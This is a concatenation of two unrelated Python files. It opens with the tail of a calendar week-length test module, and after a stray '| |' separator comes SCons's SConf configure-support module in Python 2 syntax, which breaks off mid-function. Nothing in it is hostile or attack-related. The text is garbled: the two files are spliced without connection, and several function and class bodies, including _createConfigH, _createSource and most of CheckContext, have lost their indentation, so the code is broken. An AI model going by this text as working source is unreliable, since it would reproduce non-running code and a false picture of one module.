            (2017, (3, 7, 7, 7, 7)),     # starts on friday
            (2068, (2, 7, 7, 7, 7, 1)),  # starts on saturday
        )
        for year, weeks in cases:
            self.check_weeks(year, 12, weeks)
class SundayTestCase(MonthCalendarTestCase):
    """Week-length checks with Sunday as the first day of the week."""
    firstweekday = calendar.SUNDAY
    def test_february(self):
        # (year, per-week day counts): 28- and 29-day Februaries starting
        # on various weekdays.
        cases = (
            (2009, (7, 7, 7, 7)),        # 28 days, starts on sunday
            (1999, (6, 7, 7, 7, 1)),     # 28 days, starts on monday
            (1997, (1, 7, 7, 7, 6)),     # 28 days, starts on saturday
            (2004, (7, 7, 7, 7, 1)),     # 29 days, starts on sunday
            (1960, (6, 7, 7, 7, 2)),     # 29 days, starts on monday
            (1964, (1, 7, 7, 7, 7)),     # 29 days, starts on saturday
        )
        for year, weeks in cases:
            self.check_weeks(year, 2, weeks)
    def test_april(self):
        # 30-day month starting on various weekdays.
        cases = (
            (1923, (7, 7, 7, 7, 2)),     # starts on sunday
            (1918, (6, 7, 7, 7, 3)),     # starts on monday
            (1950, (1, 7, 7, 7, 7, 1)),  # starts on saturday
            (1960, (2, 7, 7, 7, 7)),     # starts on friday
            (1909, (3, 7, 7, 7, 6)),     # starts on thursday
        )
        for year, weeks in cases:
            self.check_weeks(year, 4, weeks)
    def test_december(self):
        # 31-day month starting on various weekdays.
        cases = (
            (2080, (7, 7, 7, 7, 3)),     # starts on sunday
            (1941, (6, 7, 7, 7, 4)),     # starts on monday
            (1923, (1, 7, 7, 7, 7, 2)),  # starts on saturday
            (1948, (4, 7, 7, 7, 6)),     # starts on wednesday
            (1927, (3, 7, 7, 7, 7)),     # starts on thursday
            (1995, (2, 7, 7, 7, 7, 1)),  # starts on friday
        )
        for year, weeks in cases:
            self.check_weeks(year, 12, weeks)
def test_main():
    """Run all calendar test cases through the regrtest driver."""
    cases = (
        OutputTestCase,
        CalendarTestCase,
        MondayTestCase,
        SundayTestCase,
    )
    test_support.run_unittest(*cases)
# Allow the test file to be run directly as a script.
if __name__ == "__main__":
    test_main()
| |
"""SCons.SConf
Autoconf-like configuration support.
"""
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
import SCons.compat
import io
import os
import re
import sys
import traceback
import SCons.Action
import SCons.Builder
import SCons.Errors
import SCons.Job
import SCons.Node.FS
import SCons.Taskmaster
import SCons.Util
import SCons.Warnings
import SCons.Conftest
from SCons.Debug import Trace
# Turn off the Conftest error logging
SCons.Conftest.LogInputFiles = 0
SCons.Conftest.LogErrorMessages = 0
# Build-type bookkeeping: SCons.Script records the current build type here
# (via SetBuildType) so Configure can become a no-op for 'clean'/'help' runs.
build_type = None
build_types = ['clean', 'help']
def SetBuildType(type):
    """Record the current build type (e.g. 'clean' or 'help');
    called from SCons.Script."""
    global build_type
    build_type = type
# to be set, if we are in dry-run mode
dryrun = 0
AUTO=0 # use SCons dependency scanning for up-to-date checks
FORCE=1 # force all tests to be rebuilt
CACHE=2 # force all tests to be taken from cache (raise an error, if necessary)
cache_mode = AUTO
def SetCacheMode(mode):
    """Set the Configure cache mode. mode must be one of "auto", "force",
    or "cache"."""
    global cache_mode
    # Map each recognized mode name onto its module-level constant;
    # any other name is a hard error.
    if mode == "auto":
        cache_mode = AUTO
        return
    if mode == "force":
        cache_mode = FORCE
        return
    if mode == "cache":
        cache_mode = CACHE
        return
    raise ValueError("SCons.SConf.SetCacheMode: Unknown mode " + mode)
progress_display = SCons.Util.display # will be overwritten by SCons.Script
def SetProgressDisplay(display):
    """Set the progress display to use (called from SCons.Script)"""
    # Replaces the default SCons.Util.display installed at import time.
    global progress_display
    progress_display = display
SConfFS = None
_ac_build_counter = 0 # incremented, whenever TryBuild is called
_ac_config_logs = {} # all config.log files created in this build
_ac_config_hs = {} # all config.h files created in this build
sconf_global = None # current sconf object
def _createConfigH(target, source, env):
t = open(str(target[0]), "w")
defname = re.sub('[^A-Za-z0-9_]', '_', str(target[0]).upper())
t.write("""#ifndef %(DEFNAME)s_SEEN
#define %(DEFNAME)s_SEEN
""" % {'DEFNAME' : defname})
t.write(source[0].get_contents())
t.write("""
#endif /* %(DEFNAME)s_SEEN */
""" % {'DEFNAME' : defname})
t.close()
def _stringConfigH(target, source, env):
return "scons: Configure: creating " + str(target[0])
def CreateConfigHBuilder(env):
    """Called just before the building targets phase begins.

    Installs the SConfigHBuilder into env and schedules one builder call per
    registered config.h file; a no-op when no config.h was requested.
    """
    if not _ac_config_hs:
        return
    header_action = SCons.Action.Action(_createConfigH, _stringConfigH)
    sconfigHBld = SCons.Builder.Builder(action=header_action)
    env.Append( BUILDERS={'SConfigHBuilder':sconfigHBld} )
    for header, text in _ac_config_hs.items():
        env.SConfigHBuilder(header, env.Value(text))
class SConfWarning(SCons.Warnings.Warning):
    """Warning category for everything emitted by the Configure machinery."""
    pass
SCons.Warnings.enableWarningClass(SConfWarning)
# some error definitions
class SConfError(SCons.Errors.UserError):
    """Base class for all errors raised by the SConf (Configure) support."""
    def __init__(self,msg):
        SCons.Errors.UserError.__init__(self,msg)
class ConfigureDryRunError(SConfError):
    """Raised when a file or directory needs to be updated during a Configure
    process, but the user requested a dry-run"""
    def __init__(self,target):
        # File nodes get the "update test" wording; anything else (typically
        # the configure directory) gets the "create directory" wording.
        if isinstance(target, SCons.Node.FS.File):
            msg = 'Cannot update configure test "%s" within a dry-run.' % str(target)
        else:
            msg = 'Cannot create configure directory "%s" within a dry-run.' % str(target)
        SConfError.__init__(self,msg)
class ConfigureCacheError(SConfError):
    """Raised when a user explicitly requested the cache feature, but the test
    is run the first time."""
    def __init__(self,target):
        SConfError.__init__(self, '"%s" is not yet built and cache is forced.' % str(target))
# define actions for building text files
def _createSource( target, source, env ):
fd = open(str(target[0]), "w")
fd.write(source[0].get_contents())
fd.close()
def _stringSource( target, source, env ):
return (str(target[0]) + ' <-\n |' +
source[0].get_contents().replace( '\n', "\n |" ) )
class SConfBuildInfo(SCons.Node.FS.FileBuildInfo):
    """
    Special build info for targets of configure tests. Additional members
    are result (did the builder succeed last time?) and string, which
    contains messages of the original build phase.
    """
    result = None # -> 0/None -> no error, != 0 error
    string = None # the stdout / stderr output when building the target
    def set_build_result(self, result, string):
        """Record the outcome of the build and its captured output."""
        self.result = result
        self.string = string
class Streamer(object):
    """
    'Sniffer' for a file-like writable object. Similar to the unix tool tee.
    Everything written through the streamer is captured in an internal
    StringIO buffer and, when a wrapped stream was given, forwarded to it.
    """
    def __init__(self, orig):
        # orig may be None; then output is only captured, never forwarded.
        self.orig = orig
        self.s = io.StringIO()
    def write(self, str):
        # Forward first (when there is a wrapped stream), then capture.
        if self.orig:
            self.orig.write(str)
        self.s.write(str)
    def writelines(self, lines):
        # File-protocol writelines: one newline-terminated write per entry.
        for line in lines:
            self.write(line + '\n')
    def getvalue(self):
        """
        Return everything that has been written through this streamer.
        """
        return self.s.getvalue()
    def flush(self):
        # Flush the wrapped stream (if any) as well as the capture buffer.
        if self.orig:
            self.orig.flush()
        self.s.flush()
class SConfBuildTask(SCons.Taskmaster.AlwaysTask):
    """
    This is almost the same as SCons.Script.BuildTask. Handles SConfErrors
    correctly and knows about the current cache_mode.
    """
    def display(self, message):
        # Write a progress line to the config.log stream, if one is open.
        if sconf_global.logstream:
            sconf_global.logstream.write("scons: Configure: " + message + "\n")
    def display_cached_string(self, bi):
        """
        Logs the original builder messages, given the SConfBuildInfo instance
        bi.
        """
        if not isinstance(bi, SConfBuildInfo):
            SCons.Warnings.warn(SConfWarning,
              "The stored build information has an unexpected class: %s" % bi.__class__)
        else:
            self.display("The original builder output was:\n" +
                         (" |" + str(bi.string)).replace("\n", "\n |"))
    def failed(self):
        # check, if the reason was a ConfigureDryRunError or a
        # ConfigureCacheError and if yes, reraise the exception
        exc_type = self.exc_info()[0]
        if issubclass(exc_type, SConfError):
            raise
        elif issubclass(exc_type, SCons.Errors.BuildError):
            # we ignore Build Errors (occurs, when a test doesn't pass)
            # Clear the exception to prevent the contained traceback
            # to build a reference cycle.
            self.exc_clear()
        else:
            self.display('Caught exception while building "%s":\n' %
                         self.targets[0])
            try:
                excepthook = sys.excepthook
            except AttributeError:
                # Earlier versions of Python don't have sys.excepthook...
                def excepthook(type, value, tb):
                    traceback.print_tb(tb)
                    print type, value
            excepthook(*self.exc_info())
        return SCons.Taskmaster.Task.failed(self)
    def collect_node_states(self):
        # returns (is_up_to_date, cached_error, cachable)
        # where is_up_to_date is 1, if the node(s) are up_to_date
        #       cached_error  is 1, if the node(s) are up_to_date, but the
        #                           build will fail
        #       cachable      is 0, if some nodes are not in our cache
        # T enables Trace() debugging output for this method.
        T = 0
        changed = False
        cached_error = False
        cachable = True
        for t in self.targets:
            if T: Trace('%s' % (t))
            bi = t.get_stored_info().binfo
            if isinstance(bi, SConfBuildInfo):
                if T: Trace(': SConfBuildInfo')
                if cache_mode == CACHE:
                    t.set_state(SCons.Node.up_to_date)
                    if T: Trace(': set_state(up_to-date)')
                else:
                    if T: Trace(': get_state() %s' % t.get_state())
                    if T: Trace(': changed() %s' % t.changed())
                    if (t.get_state() != SCons.Node.up_to_date and t.changed()):
                        changed = True
                    if T: Trace(': changed %s' % changed)
                cached_error = cached_error or bi.result
            else:
                if T: Trace(': else')
                # the node hasn't been built in a SConf context or doesn't
                # exist
                cachable = False
                changed = ( t.get_state() != SCons.Node.up_to_date )
                if T: Trace(': changed %s' % changed)
        if T: Trace('\n')
        return (not changed, cached_error, cachable)
    def execute(self):
        # Run one configure-test build, honoring dryrun and cache_mode, and
        # record the outcome (including captured output) in the .sconsign.
        if not self.targets[0].has_builder():
            return
        sconf = sconf_global
        is_up_to_date, cached_error, cachable = self.collect_node_states()
        if cache_mode == CACHE and not cachable:
            raise ConfigureCacheError(self.targets[0])
        elif cache_mode == FORCE:
            is_up_to_date = 0
        if cached_error and is_up_to_date:
            self.display("Building \"%s\" failed in a previous run and all "
                         "its sources are up to date." % str(self.targets[0]))
            binfo = self.targets[0].get_stored_info().binfo
            self.display_cached_string(binfo)
            raise SCons.Errors.BuildError # will be 'caught' in self.failed
        elif is_up_to_date:
            self.display("\"%s\" is up to date." % str(self.targets[0]))
            binfo = self.targets[0].get_stored_info().binfo
            self.display_cached_string(binfo)
        elif dryrun:
            raise ConfigureDryRunError(self.targets[0])
        else:
            # note stdout and stderr are the same here
            s = sys.stdout = sys.stderr = Streamer(sys.stdout)
            try:
                env = self.targets[0].get_build_env()
                if cache_mode == FORCE:
                    # Set up the Decider() to force rebuilds by saying
                    # that every source has changed. Note that we still
                    # call the environment's underlying source decider so
                    # that the correct .sconsign info will get calculated
                    # and keep the build state consistent.
                    def force_build(dependency, target, prev_ni,
                                    env_decider=env.decide_source):
                        env_decider(dependency, target, prev_ni)
                        return True
                    if env.decide_source.func_code is not force_build.func_code:
                        env.Decider(force_build)
                env['PSTDOUT'] = env['PSTDERR'] = s
                try:
                    sconf.cached = 0
                    self.targets[0].build()
                finally:
                    sys.stdout = sys.stderr = env['PSTDOUT'] = \
                                 env['PSTDERR'] = sconf.logstream
            except KeyboardInterrupt:
                raise
            except SystemExit:
                exc_value = sys.exc_info()[1]
                raise SCons.Errors.ExplicitExit(self.targets[0],exc_value.code)
            except Exception, e:
                # Build failed: remember the failure (result=1) together with
                # the captured output, then re-raise for failed() to handle.
                for t in self.targets:
                    binfo = t.get_binfo()
                    binfo.__class__ = SConfBuildInfo
                    binfo.set_build_result(1, s.getvalue())
                    sconsign_entry = SCons.SConsign.SConsignEntry()
                    sconsign_entry.binfo = binfo
                    #sconsign_entry.ninfo = self.get_ninfo()
                    # We'd like to do this as follows:
                    #    t.store_info(binfo)
                    # However, we need to store it as an SConfBuildInfo
                    # object, and store_info() will turn it into a
                    # regular FileNodeInfo if the target is itself a
                    # regular File.
                    sconsign = t.dir.sconsign()
                    sconsign.set_entry(t.name, sconsign_entry)
                    sconsign.merge()
                raise e
            else:
                # Build succeeded: remember success (result=0) plus output.
                for t in self.targets:
                    binfo = t.get_binfo()
                    binfo.__class__ = SConfBuildInfo
                    binfo.set_build_result(0, s.getvalue())
                    sconsign_entry = SCons.SConsign.SConsignEntry()
                    sconsign_entry.binfo = binfo
                    #sconsign_entry.ninfo = self.get_ninfo()
                    # We'd like to do this as follows:
                    #    t.store_info(binfo)
                    # However, we need to store it as an SConfBuildInfo
                    # object, and store_info() will turn it into a
                    # regular FileNodeInfo if the target is itself a
                    # regular File.
                    sconsign = t.dir.sconsign()
                    sconsign.set_entry(t.name, sconsign_entry)
                    sconsign.merge()
class SConfBase(object):
    """This is simply a class to represent a configure context. After
    creating a SConf object, you can call any tests. After finished with your
    tests, be sure to call the Finish() method, which returns the modified
    environment.
    Some words about caching: In most cases, it is not necessary to cache
    Test results explicitly. Instead, we use the scons dependency checking
    mechanism. For example, if one wants to compile a test program
    (SConf.TryLink), the compiler is only called, if the program dependencies
    have changed. However, if the program could not be compiled in a former
    SConf run, we need to explicitly cache this error.
    """
    def __init__(self, env, custom_tests = {}, conf_dir='$CONFIGUREDIR',
                 log_file='$CONFIGURELOG', config_h = None, _depth = 0):
        """Constructor. Pass additional tests in the custom_tests-dictionary,
        e.g. custom_tests={'CheckPrivate':MyPrivateTest}, where MyPrivateTest
        defines a custom test.
        Note also the conf_dir and log_file arguments (you may want to
        build tests in the VariantDir, not in the SourceDir)
        """
        global SConfFS
        if not SConfFS:
            SConfFS = SCons.Node.FS.default_fs or \
                      SCons.Node.FS.FS(env.fs.pathTop)
        # Only one configure context may be active at a time.
        if sconf_global is not None:
            raise SCons.Errors.UserError
        self.env = env
        if log_file is not None:
            log_file = SConfFS.File(env.subst(log_file))
        self.logfile = log_file
        self.logstream = None
        self.lastTarget = None
        self.depth = _depth
        self.cached = 0 # will be set, if all test results are cached
        # add default tests
        default_tests = {
            'CheckCC' : CheckCC,
            'CheckCXX' : CheckCXX,
            'CheckSHCC' : CheckSHCC,
            'CheckSHCXX' : CheckSHCXX,
            'CheckFunc' : CheckFunc,
            'CheckType' : CheckType,
            'CheckTypeSize' : CheckTypeSize,
            'CheckDeclaration' : CheckDeclaration,
            'CheckHeader' : CheckHeader,
            'CheckCHeader' : CheckCHeader,
            'CheckCXXHeader' : CheckCXXHeader,
            'CheckLib' : CheckLib,
            'CheckLibWithHeader' : CheckLibWithHeader,
        }
        self.AddTests(default_tests)
        self.AddTests(custom_tests)
        self.confdir = SConfFS.Dir(env.subst(conf_dir))
        if config_h is not None:
            config_h = SConfFS.File(config_h)
        self.config_h = config_h
        self._startup()
    def Finish(self):
        """Call this method after finished with your tests:
        env = sconf.Finish()
        """
        self._shutdown()
        return self.env
    def Define(self, name, value = None, comment = None):
        """
        Define a pre processor symbol name, with the optional given value in the
        current config header.
        If value is None (default), then #define name is written. If value is not
        none, then #define name value is written.
        comment is a string which will be put as a C comment in the
        header, to explain the meaning of the value (appropriate C comments /* and
        */ will be put automatically)."""
        lines = []
        if comment:
            comment_str = "/* %s */" % comment
            lines.append(comment_str)
        if value is not None:
            define_str = "#define %s %s" % (name, value)
        else:
            define_str = "#define %s" % name
        lines.append(define_str)
        lines.append('')
        self.config_h_text = self.config_h_text + '\n'.join(lines)
    def BuildNodes(self, nodes):
        """
        Tries to build the given nodes immediately. Returns 1 on success,
        0 on error.
        """
        if self.logstream is not None:
            # override stdout / stderr to write in log file
            oldStdout = sys.stdout
            sys.stdout = self.logstream
            oldStderr = sys.stderr
            sys.stderr = self.logstream
        # the engine assumes the current path is the SConstruct directory ...
        old_fs_dir = SConfFS.getcwd()
        old_os_dir = os.getcwd()
        SConfFS.chdir(SConfFS.Top, change_os_dir=1)
        # Because we take responsibility here for writing out our
        # own .sconsign info (see SConfBuildTask.execute(), above),
        # we override the store_info() method with a null place-holder
        # so we really control how it gets written.
        for n in nodes:
            n.store_info = n.do_not_store_info
        ret = 1
        try:
            # ToDo: use user options for calc
            save_max_drift = SConfFS.get_max_drift()
            SConfFS.set_max_drift(0)
            tm = SCons.Taskmaster.Taskmaster(nodes, SConfBuildTask)
            # we don't want to build tests in parallel
            jobs = SCons.Job.Jobs(1, tm )
            jobs.run()
            for n in nodes:
                state = n.get_state()
                if (state != SCons.Node.executed and
                    state != SCons.Node.up_to_date):
                    # the node could not be built. we return 0 in this case
                    ret = 0
        finally:
            # Restore drift, working directories and the output streams.
            SConfFS.set_max_drift(save_max_drift)
            os.chdir(old_os_dir)
            SConfFS.chdir(old_fs_dir, change_os_dir=0)
            if self.logstream is not None:
                # restore stdout / stderr
                sys.stdout = oldStdout
                sys.stderr = oldStderr
        return ret
    def pspawn_wrapper(self, sh, escape, cmd, args, env):
        """Wrapper function for handling piped spawns.
        This looks to the calling interface (in Action.py) like a "normal"
        spawn, but associates the call with the PSPAWN variable from
        the construction environment and with the streams to which we
        want the output logged. This gets slid into the construction
        environment as the SPAWN variable so Action.py doesn't have to
        know or care whether it's spawning a piped command or not.
        """
        return self.pspawn(sh, escape, cmd, args, env, self.logstream, self.logstream)
    def TryBuild(self, builder, text = None, extension = ""):
        """Low level TryBuild implementation. Normally you don't need to
        call that - you can use TryCompile / TryLink / TryRun instead
        """
        global _ac_build_counter
        # Make sure we have a PSPAWN value, and save the current
        # SPAWN value.
        try:
            self.pspawn = self.env['PSPAWN']
        except KeyError:
            raise SCons.Errors.UserError('Missing PSPAWN construction variable.')
        try:
            save_spawn = self.env['SPAWN']
        except KeyError:
            raise SCons.Errors.UserError('Missing SPAWN construction variable.')
        nodesToBeBuilt = []
        # Each test gets a unique conftest_<N> basename.
        f = "conftest_" + str(_ac_build_counter)
        pref = self.env.subst( builder.builder.prefix )
        suff = self.env.subst( builder.builder.suffix )
        target = self.confdir.File(pref + f + suff)
        try:
            # Slide our wrapper into the construction environment as
            # the SPAWN function.
            self.env['SPAWN'] = self.pspawn_wrapper
            sourcetext = self.env.Value(text)
            if text is not None:
                textFile = self.confdir.File(f + extension)
                textFileNode = self.env.SConfSourceBuilder(target=textFile,
                                                           source=sourcetext)
                nodesToBeBuilt.extend(textFileNode)
                source = textFileNode
            else:
                source = None
            nodes = builder(target = target, source = source)
            if not SCons.Util.is_List(nodes):
                nodes = [nodes]
            nodesToBeBuilt.extend(nodes)
            result = self.BuildNodes(nodesToBeBuilt)
        finally:
            self.env['SPAWN'] = save_spawn
        _ac_build_counter = _ac_build_counter + 1
        if result:
            self.lastTarget = nodes[0]
        else:
            self.lastTarget = None
        return result
    def TryAction(self, action, text = None, extension = ""):
        """Tries to execute the given action with optional source file
        contents <text> and optional source file extension <extension>,
        Returns the status (0 : failed, 1 : ok) and the contents of the
        output file.
        """
        builder = SCons.Builder.Builder(action=action)
        self.env.Append( BUILDERS = {'SConfActionBuilder' : builder} )
        ok = self.TryBuild(self.env.SConfActionBuilder, text, extension)
        del self.env['BUILDERS']['SConfActionBuilder']
        if ok:
            outputStr = self.lastTarget.get_contents()
            return (1, outputStr)
        return (0, "")
    def TryCompile( self, text, extension):
        """Compiles the program given in text to an env.Object, using extension
        as file extension (e.g. '.c'). Returns 1, if compilation was
        successful, 0 otherwise. The target is saved in self.lastTarget (for
        further processing).
        """
        return self.TryBuild(self.env.Object, text, extension)
    def TryLink( self, text, extension ):
        """Compiles the program given in text to an executable env.Program,
        using extension as file extension (e.g. '.c'). Returns 1, if
        compilation was successful, 0 otherwise. The target is saved in
        self.lastTarget (for further processing).
        """
        return self.TryBuild(self.env.Program, text, extension )
    def TryRun(self, text, extension ):
        """Compiles and runs the program given in text, using extension
        as file extension (e.g. '.c'). Returns (1, outputStr) on success,
        (0, '') otherwise. The target (a file containing the program's stdout)
        is saved in self.lastTarget (for further processing).
        """
        ok = self.TryLink(text, extension)
        if( ok ):
            prog = self.lastTarget
            pname = prog.path
            # Run the freshly linked program and capture its stdout.
            output = self.confdir.File(os.path.basename(pname)+'.out')
            node = self.env.Command(output, prog, [ [ pname, ">", "${TARGET}"] ])
            ok = self.BuildNodes(node)
            if ok:
                outputStr = output.get_contents()
                return( 1, outputStr)
        return (0, "")
    class TestWrapper(object):
        """A wrapper around Tests (to ensure sanity)"""
        def __init__(self, test, sconf):
            self.test = test
            self.sconf = sconf
        def __call__(self, *args, **kw):
            # Tests may only run while the owning SConf is active.
            if not self.sconf.active:
                raise SCons.Errors.UserError
            context = CheckContext(self.sconf)
            ret = self.test(context, *args, **kw)
            if self.sconf.config_h is not None:
                self.sconf.config_h_text = self.sconf.config_h_text + context.config_h
            # In case the test did not print a result itself.
            context.Result("error: no result")
            return ret
    def AddTest(self, test_name, test_instance):
        """Adds test_class to this SConf instance. It can be called with
        self.test_name(...)"""
        setattr(self, test_name, SConfBase.TestWrapper(test_instance, self))
    def AddTests(self, tests):
        """Adds all the tests given in the tests dictionary to this SConf
        instance
        """
        for name in tests.keys():
            self.AddTest(name, tests[name])
    def _createDir( self, node ):
        # Create the configure test directory, honouring dry-run mode.
        dirName = str(node)
        if dryrun:
            if not os.path.isdir( dirName ):
                raise ConfigureDryRunError(dirName)
        else:
            if not os.path.isdir( dirName ):
                os.makedirs( dirName )
                node._exists = 1
    def _startup(self):
        """Private method. Set up logstream, and set the environment
        variables necessary for a piped build
        """
        global _ac_config_logs
        global sconf_global
        global SConfFS
        self.lastEnvFs = self.env.fs
        self.env.fs = SConfFS
        self._createDir(self.confdir)
        self.confdir.up().add_ignore( [self.confdir] )
        if self.logfile is not None and not dryrun:
            # truncate logfile, if SConf.Configure is called for the first time
            # in a build
            if self.logfile in _ac_config_logs:
                log_mode = "a"
            else:
                _ac_config_logs[self.logfile] = None
                log_mode = "w"
            fp = open(str(self.logfile), log_mode)
            self.logstream = SCons.Util.Unbuffered(fp)
            # logfile may stay in a build directory, so we tell
            # the build system not to override it with a eventually
            # existing file with the same name in the source directory
            self.logfile.dir.add_ignore( [self.logfile] )
            # Log the SConscript location that invoked Configure().
            tb = traceback.extract_stack()[-3-self.depth]
            old_fs_dir = SConfFS.getcwd()
            SConfFS.chdir(SConfFS.Top, change_os_dir=0)
            self.logstream.write('file %s,line %d:\n\tConfigure(confdir = %s)\n' %
                                 (tb[0], tb[1], str(self.confdir)) )
            SConfFS.chdir(old_fs_dir)
        else:
            self.logstream = None
        # we use a special builder to create source files from TEXT
        action = SCons.Action.Action(_createSource,
                                     _stringSource)
        sconfSrcBld = SCons.Builder.Builder(action=action)
        self.env.Append( BUILDERS={'SConfSourceBuilder':sconfSrcBld} )
        self.config_h_text = _ac_config_hs.get(self.config_h, "")
        self.active = 1
        # only one SConf instance should be active at a time ...
        sconf_global = self
    def _shutdown(self):
        """Private method. Reset to non-piped spawn"""
        global sconf_global, _ac_config_hs
        if not self.active:
            raise SCons.Errors.UserError("Finish may be called only once!")
        if self.logstream is not None and not dryrun:
            self.logstream.write("\n")
            self.logstream.close()
            self.logstream = None
        # remove the SConfSourceBuilder from the environment
        blds = self.env['BUILDERS']
        del blds['SConfSourceBuilder']
        self.env.Replace( BUILDERS=blds )
        self.active = 0
        sconf_global = None
        # Remember the accumulated config.h text for CreateConfigHBuilder().
        if not self.config_h is None:
            _ac_config_hs[self.config_h] = self.config_h_text
        self.env.fs = self.lastEnvFs
class CheckContext(object):
"""Provides a context for configure tests. Defines how a test writes to the
screen and log file.
A typical test is just a callable with an instance of CheckContext as
first argument:
def CheckCustom(context, ...)
context.Message('Checking my weird test ... ')
ret = myWeirdTestFunction(...)
context.Result(ret)
Often, myWeirdTestFunction will be one of
context.TryCompile/context.TryLink/context.TryRun. The results of
those are cached, for they are only rebuild, if the dependencies have
changed.
"""
def __init__(self, sconf):
"""Constructor. Pass the corresponding SConf instance."""
self.sconf = sconf
self.did_show_result = 0
# for Conftest.py:
self.vardict = {}
self.havedict = {}
self.headerfilename = None
self.config_h = "" # config_h text will be stored here
# we don't regenerate the config.h file after each test. That means,
# that tests won't be able to include the config.h file, and so
# they can't do an #ifdef HAVE_XXX_H. This shouldn't be a major
# issue, though. If it turns out, that we need to include config.h
# in tests, we must ensure, that the dependencies are worked out
# correctly. Note that we can't use Conftest.py's support for config.h,
# cause we will need to specify a builder for the config.h file ...
def Message(self, text):
"""Inform about what we are doing right now, e.g.
'Checking for SOMETHING ... '
"""
self.Display(text)
self.sconf.cached = 1
self.did_show_result = 0
def Result(self, res):
"""Inform about the result of the test. res may be an integer or a
string. In case of an integer, the written text will be 'yes' or 'no'.
The result is only displayed when self.did_show_result is not set.
"""
if isinstance(res, (int, bool)):
if res:
text = "yes"
else:
text = "no"
elif isinstance(res, str):
text = res
else:
raise TypeError("Expected string, int or bool, got " + str(type(res)))
if self.did_show_result == 0:
# Didn't show result yet, do it now.
self.Display(text + "\n")
self.did_show_result = 1
def TryBuild(self, *args, **kw):
return self.sconf.TryBuild(*args, **kw)
def TryAction(self, *args, **kw):
return self.sconf.TryAction(*args, **kw)
def TryCompile(self, *args, **kw):
return self.sconf.TryCompile(*args, **kw)
def TryLink(self, *args, **kw):
return self.sconf.TryLink(*args, **kw)
def TryRun(self, *args, **kw):
return self.sconf.TryRun(*args, **kw)
def __getattr__( self, attr ):
if( attr == 'env' ):
return self.sconf.env
elif( attr == 'lastTarget' ):
return self.sconf.lastTarget
else:
raise AttributeError("CheckContext instance has no attribute '%s'" % attr)
#### Stuff used by Conftest.py (look there for explanations).
    def BuildProg(self, text, ext):
        """Compile and link 'text' as a program; returns 0 on success
        (Conftest convention), hence the inversion of TryBuild's result."""
        self.sconf.cached = 1
        # TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
        return not self.TryBuild(self.env.Program, text, ext)
    def CompileProg(self, text, ext):
        """Compile 'text' to an object file; returns 0 on success."""
        self.sconf.cached = 1
        # TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
        return not self.TryBuild(self.env.Object, text, ext)
    def CompileSharedObject(self, text, ext):
        """Compile 'text' to a shared object; returns 0 on success."""
        self.sconf.cached = 1
        # TODO: should use self.vardict for $SHCC, $CPPFLAGS, etc.
        return not self.TryBuild(self.env.SharedObject, text, ext)
    def RunProg(self, text, ext):
        """Build and run 'text'; returns (status, output) with status 0
        on success (Conftest convention)."""
        self.sconf.cached = 1
        # TODO: should use self.vardict for $CC, $CPPFLAGS, etc.
        st, out = self.TryRun(text, ext)
        return not st, out
    def AppendLIBS(self, lib_name_list):
        """Append libraries to $LIBS; returns the previous value so the
        caller can restore it afterwards."""
        oldLIBS = self.env.get( 'LIBS', [] )
        self.env.Append(LIBS = lib_name_list)
        return oldLIBS
    def PrependLIBS(self, lib_name_list):
        """Prepend libraries to $LIBS; returns the previous value."""
        oldLIBS = self.env.get( 'LIBS', [] )
        self.env.Prepend(LIBS = lib_name_list)
        return oldLIBS
    def SetLIBS(self, val):
        """Replace $LIBS entirely; returns the previous value."""
        oldLIBS = self.env.get( 'LIBS', [] )
        self.env.Replace(LIBS = val)
        return oldLIBS
    def Display(self, msg):
        """Write a progress message to the screen and to the log file."""
        if self.sconf.cached:
            # We assume that Display is called twice for each test here
            # once for the Checking for ... message and once for the result.
            # The self.sconf.cached flag can only be set between those calls
            msg = "(cached) " + msg
            self.sconf.cached = 0
        progress_display(msg, append_newline=0)
        self.Log("scons: Configure: " + msg + "\n")
def Log(self, msg):
if self.sconf.logstream is not None:
self.sconf.logstream.write(msg)
#### End of stuff used by Conftest.py.
def SConf(*args, **kw):
    """Factory for configure contexts.

    Returns a real SConfBase unless configuration is disabled for the
    current build type, in which case a do-nothing Null object is
    returned instead.
    """
    enabled = kw.get(build_type, True)
    # The build-type flags are consumed here; SConfBase must not see them.
    for bt in build_types:
        kw.pop(bt, None)
    if not enabled:
        return SCons.Util.Null()
    kw['_depth'] = kw.get('_depth', 0) + 1
    return SConfBase(*args, **kw)
def CheckFunc(context, function_name, header = None, language = None):
    """Check whether function_name is available; returns True on success.

    SCons.Conftest returns 0 on success, hence the 'not res' inversion.
    """
    res = SCons.Conftest.CheckFunc(context, function_name, header = header, language = language)
    context.did_show_result = 1
    return not res

def CheckType(context, type_name, includes = "", language = None):
    """Check whether type_name is defined; returns True on success."""
    res = SCons.Conftest.CheckType(context, type_name,
                                   header = includes, language = language)
    context.did_show_result = 1
    return not res

def CheckTypeSize(context, type_name, includes = "", language = None, expect = None):
    """Determine the size of type_name.

    Note: unlike the other Check* helpers, this returns the raw Conftest
    result (the size) rather than a negated status.
    """
    res = SCons.Conftest.CheckTypeSize(context, type_name,
                                       header = includes, language = language,
                                       expect = expect)
    context.did_show_result = 1
    return res

def CheckDeclaration(context, declaration, includes = "", language = None):
    """Check whether 'declaration' is declared; returns True on success."""
    res = SCons.Conftest.CheckDeclaration(context, declaration,
                                          includes = includes,
                                          language = language)
    context.did_show_result = 1
    return not res
def createIncludesFromHeaders(headers, leaveLast, include_quotes = '""'):
